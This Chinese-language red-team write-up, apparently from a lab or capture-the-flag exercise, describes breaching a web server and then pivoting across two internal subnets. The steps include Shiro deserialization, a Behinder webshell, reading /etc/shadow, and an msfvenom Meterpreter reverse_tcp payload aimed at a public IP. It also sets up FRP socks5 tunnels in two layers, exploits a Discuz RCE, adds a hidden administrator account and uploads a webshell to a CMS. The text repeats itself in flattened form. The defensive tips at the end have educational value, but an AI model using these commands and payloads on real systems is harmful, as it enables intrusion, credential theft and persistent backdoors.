红队攻防渗透——通过二层代理拿下内网服务器
字数 1348 2025-08-11 21:26:29

红队攻防渗透:通过二层代理拿下内网服务器

1. 信息收集阶段

1.1 工具选择与使用

  • 御剑扫描:效果不佳,未扫描出有用信息
  • 7kb扫描:效果一般,未发现关键信息
  • 端口扫描:发现关键端口
    • 22端口:SSH服务,尝试弱口令爆破未果
    • 80端口:Web服务
    • 8086端口:未深入利用

1.2 目录爆破

  • 推荐使用Kali Linux中的dirb工具
  • 将扫描结果导入Ehole3.0-linux进行批量指纹识别
    • 命令:./Ehole3.0-linux -l url.txt
  • 发现关键路径:http://xxx.x.xx.x:38080/sh/,识别为Shiro框架

2. 漏洞利用

2.1 Shiro反序列化攻击

  • 使用Shiro反序列化回显工具
  • 直接写入冰蝎(Behinder)的Webshell并连接
  • 成功获取Linux主机shell

2.2 内网信息收集

  • 执行基本系统检查命令: 
    ifconfig  # 查看网络配置
cat /etc/passwd  # 查看用户列表
cat /etc/shadow  # 查看密码哈希
hostname  # 查看主机名
whoami  # 查看当前权限
  • 确认已获取root权限

3. 内网横向移动

3.1 MSF联动

  • 生成木马: 
    msfvenom -p windows/meterpreter/reverse_tcp lhost=43.138.57.125 lport=5555 -f exe -o /tmp/wangkun.elf
  • 使用杀软识别网站:https://i.hacking8.com/tiquan/
  • 在服务器上设置监听
  • 通过冰蝎配置并连接

3.2 FRP代理搭建

一层代理配置

服务器端配置(frps.ini):

[common]
bind_port = 4000

运行命令:./frps -c frpc.ini

受害主机配置:

  1. 上传FRP工具
  2. 赋予权限: 
    chmod +x frpc frpc.ini frpc_full.ini LICENSE
  3. 启动客户端:./frpc -c ./frpc.ini

发现内网服务

  • 发现192.168.2.242上的80端口运行Discuz
  • 使用火狐配置代理访问

3.3 Discuz漏洞利用

  • 利用CNVD-2019-22239漏洞
  • 工具来源:https://github.com/theLSA/discuz-ml-rce
  • 使用蚁剑配置代理连接Webshell
  • 提权操作: 
    net user mysql$ envl /add  # 添加用户
net localgroup administrators mysql$ /add  # 添加到管理员组

3.4 内网进一步发现

  • 使用fscan进行内网扫描: 
    fscan.exe -h 192.168.3.0/24 > 111.txt
  • 发现新网段192.168.3.0/24

4. 二层代理搭建

4.1 服务器配置(frps_vps.ini)

[common]
bind_port = 7000

运行:./frps -c frps_vps.ini

4.2 内网第一跳主机(192.168.2.151)配置(frpc_11.ini)

[common]
server_addr = 43.138.57.125
server_port = [socks5_to_2]
type = tcp
remote_port = 10088
plugin = socks5
[socks5_to_3]
type = tcp
local_ip = 127.0.0.1
local_port = 10089
remote_port = 10090

运行:./frpc -c frpc_11.ini

4.3 内网第二跳主机(192.168.2.190)配置(frpc_2.ini)

[common]
server_addr = 192.168.2.151
server_port = 7000
[socks5_2]
type = tcp
plugin = socks5
remote_port = 10089

运行:./frpc -c frpc_2.ini

5. 最终目标攻击

5.1 狮子鱼CMS攻击

  • 发现192.168.3.180:80运行狮子鱼CMS
  • 利用任意文件上传漏洞获取shell
  • 访问上传的Webshell: 
    http://192.168.3.180/Common/image/uploads/1656091711618.php
  • 密码:wkk
  • 获取最终flag

6. 技术要点总结

  1. 信息收集:多工具组合使用,dirb+Ehole效果最佳
  2. 漏洞利用
    • Shiro反序列化
    • Discuz历史漏洞(CNVD-2019-22239)
    • 狮子鱼CMS任意文件上传
  3. 代理技术
    • FRP一层代理穿透
    • FRP二层代理深入内网
  4. 工具组合
    • 冰蝎+MSF联动
    • 蚁剑代理配置
    • fscan内网扫描

7. 防御建议

  1. 及时更新框架和CMS系统
  2. 限制不必要的端口暴露
  3. 加强内网隔离
  4. 监控异常代理行为
  5. 实施严格的权限管理

注:本文所述技术仅用于学习教育目的,非法使用后果自负。

红队攻防渗透:通过二层代理拿下内网服务器 1. 信息收集阶段 1.1 工具选择与使用 御剑扫描 :效果不佳,未扫描出有用信息 7kb扫描 :效果一般,未发现关键信息 端口扫描 :发现关键端口 22端口:SSH服务,尝试弱口令爆破未果 80端口:Web服务 8086端口:未深入利用 1.2 目录爆破 推荐使用Kali Linux中的 dirb 工具 将扫描结果导入Ehole3.0-linux进行批量指纹识别 命令: ./Ehole3.0-linux -l url.txt 发现关键路径: http://xxx.x.xx.x:38080/sh/ ,识别为Shiro框架 2. 漏洞利用 2.1 Shiro反序列化攻击 使用Shiro反序列化回显工具 直接写入冰蝎(Behinder)的Webshell并连接 成功获取Linux主机shell 2.2 内网信息收集 执行基本系统检查命令: 确认已获取root权限 3. 内网横向移动 3.1 MSF联动 生成木马: 使用杀软识别网站:https://i.hacking8.com/tiquan/ 在服务器上设置监听 通过冰蝎配置并连接 3.2 FRP代理搭建 一层代理配置 服务器端配置(frps.ini) : 运行命令: ./frps -c frpc.ini 受害主机配置 : 上传FRP工具 赋予权限: 启动客户端: ./frpc -c ./frpc.ini 发现内网服务 发现192.168.2.242上的80端口运行Discuz 使用火狐配置代理访问 3.3 Discuz漏洞利用 利用CNVD-2019-22239漏洞 工具来源:https://github.com/theLSA/discuz-ml-rce 使用蚁剑配置代理连接Webshell 提权操作: 3.4 内网进一步发现 使用fscan进行内网扫描: 发现新网段192.168.3.0/24 4. 二层代理搭建 4.1 服务器配置(frps_ vps.ini) 运行: ./frps -c frps_vps.ini 4.2 内网第一跳主机(192.168.2.151)配置(frpc_ 11.ini) 运行: ./frpc -c frpc_11.ini 4.3 内网第二跳主机(192.168.2.190)配置(frpc_ 2.ini) 运行: ./frpc -c frpc_2.ini 5. 最终目标攻击 5.1 狮子鱼CMS攻击 发现192.168.3.180:80运行狮子鱼CMS 利用任意文件上传漏洞获取shell 访问上传的Webshell: 密码:wkk 获取最终flag 6. 技术要点总结 信息收集 :多工具组合使用,dirb+Ehole效果最佳 漏洞利用 : Shiro反序列化 Discuz历史漏洞(CNVD-2019-22239) 狮子鱼CMS任意文件上传 代理技术 : FRP一层代理穿透 FRP二层代理深入内网 工具组合 : 冰蝎+MSF联动 蚁剑代理配置 fscan内网扫描 7. 防御建议 及时更新框架和CMS系统 限制不必要的端口暴露 加强内网隔离 监控异常代理行为 实施严格的权限管理 注:本文所述技术仅用于学习教育目的,非法使用后果自负。